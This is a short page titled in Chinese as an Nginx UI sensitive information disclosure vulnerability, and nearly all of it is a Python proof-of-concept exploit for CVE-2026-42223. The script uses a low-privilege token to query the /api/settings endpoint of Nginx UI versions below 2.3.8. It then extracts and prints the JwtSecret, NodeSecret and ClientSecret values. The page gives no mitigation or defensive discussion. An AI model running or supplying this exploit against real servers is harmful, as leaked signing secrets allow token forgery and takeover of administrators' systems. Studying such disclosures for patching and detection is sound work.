CVE-2026-42223 Nginx UI敏感信息泄露漏洞

import requests # CVE-2026-42223 PoC # Target: Nginx UI < 2.3.8 # Description: Retrieves sensitive settings including JwtSecret via the GetSettings API. target_url = "http://target-ip/api/settings" # Attacker needs a valid low-privilege token headers = { "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>" } try: response = requests.get(target_url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive keys sensitive_keys = ["JwtSecret", "NodeSecret", "ClientSecret"] found_secrets = {k: v for k, v in data.items() if k in sensitive_keys} print(f"[+] Sensitive data leaked: {found_secrets}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")